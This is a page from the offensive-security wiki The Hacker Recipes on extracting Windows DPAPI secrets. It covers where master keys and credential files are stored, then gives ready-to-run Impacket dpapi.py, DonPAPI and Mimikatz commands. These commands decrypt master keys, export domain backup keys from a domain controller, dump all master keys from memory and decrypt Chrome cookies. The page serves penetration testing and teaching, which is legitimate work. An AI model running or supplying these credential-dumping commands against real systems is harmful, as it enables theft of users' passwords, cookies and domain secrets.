The Hacker Recipes
GitHubTwitterKo-fi (one-time support)Patreon (monthly support)
Search…
Introduction
Active Directory
Reconnaissance
Movement
Credentials
Dumping
SAM & LSA secrets
DPAPI secrets
NTDS secrets
LSASS secrets
DCSync
Group Policy Preferences
Network shares
Network protocols
Web browsers
In-memory secrets
🛠️ Cached Kerberos tickets
🛠️ Windows Credential Manager
🛠️ Local files
🛠️ Password managers
Cracking
Bruteforcing
Shuffling
Impersonation
MITM and coerced auths
NTLM
Kerberos
Access controls
Group policies
Built-in groups
Domain settings
🛠️ Trusts
Netlogon
Certificate Services (AD-CS)
Exchange services
Print Spooler Service
Persistence
Web services
Reconnaissance
Configuration
Accounts and sessions
User inputs
Systems & services
Reconnaissance
Movement
Privilege escalation
Pivoting
🛠️ Physical
Locks
Networking
Machines
Super secret zones
🛠️ Intelligence gathering
CYBINT
OSINT
GEOINT
🛠️ RADIO
RFID
Bluetooth
Wi-Fi
Wireless keyboard/mouse
🛠️ binary exploitation
Use-after-free
Buffer overflow
🛠️ mobile apps
Android
iOS
Powered By GitBook
DPAPI secrets
MITRE ATT&CK™ Sub-technique T1555.003

Theory

The DPAPI (Data Protection API) is an internal component in the Windows system. It allows various applications to store sensitive data (e.g. passwords). The data are stored in the users directory and are secured by user-specific master keys derived from the users password. They are usually located at:
1
C:\Users\$USER\AppData\Roaming\Microsoft\Protect\$SUID\$GUID
Copied!
Application like Google Chrome, Outlook, Internet Explorer, Skype use the DPAPI. Windows also uses that API for sensitive information like Wi-Fi passwords, certificates, RDP connection passwords, and many more.
Below are common paths of hidden files that usually contain DPAPI-protected data.
1
C:\Users\$USER\AppData\Local\Microsoft\Credentials\
2
C:\Users\$USER\AppData\Roaming\Microsoft\Credentials\
Copied!

Practice

UNIX-like
Windows
From UNIX-like systems, DPAPI-data can be manipulated (mainly offline) with tools like dpapick (Python), dpapilab (Python), Impacket's dpapi.py and secretsdump.py (Python).
1
# (not tested) Decrypt a master key
2
dpapi.py masterkey -file "/path/to/masterkey_file" -sid $USER_SID -password $MASTERKEY_PASSWORD
3
4
# (not tested) Obtain the backup keys & use it to decrypt a master key
5
dpapi.py backupkeys -t $DOMAIN/$USER:$PASSWORD@$TARGET
6
dpapi.py masterkey -file "/path/to/masterkey_file" -pvk "/path/to/backup_key.pvk"
7
8
# (not tested) Decrypt DPAPI-protected data using a master key
9
dpapi.py credential -file "/path/to/protected_file" -key $MASTERKEY
Copied!
DonPAPI (Python) can also be used to remotely extract a user's DPAPI secrets more easily. It supports pass-the-hash, pass-the-ticket and so on.
1
DonPAPI.py 'domain'/'username':'password'@<'targetName' or 'address/mask'>
Copied!
On Windows systems Mimikatz (C) can be used to extract, decrypt or use specific master keys using specified passwords or given sufficient privileges.
1
# Extract and decrypt a master key
2
dpapi::masterkey /in:"C:\Users\$USER\AppData\Roaming\Microsoft\Protect\$SUID\$GUID" /sid:$SID /password:$PASSWORD /protected
3
4
# Extract and decrypt all master keys
5
sekurlsa::dpapi
6
7
# Extract the backup keys & use it to decrypt a master key
8
lsadump::backupkeys /system:$DOMAIN_CONTROLLER /export
9
dpapi::masterkey /in:"C:\Users\$USER\AppData\Roaming\Microsoft\Protect\$SUID\$GUID" /pvk:$BACKUP_KEY_EXPORT_PVK
10
11
# Decrypt Chrome data
12
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies"
13
14
# Decrypt DPAPI-protected data using a master key
15
dpapi::cred /in:"C:\path\to\encrypted\file" /masterkey:$MASTERKEY
Copied!

Resources

DPAPI - Extracting Passwords
HackTricks
Previous
SAM & LSA secrets
Next
NTDS secrets
Last modified 12d ago
Copy link
Contents
Theory
Practice
Resources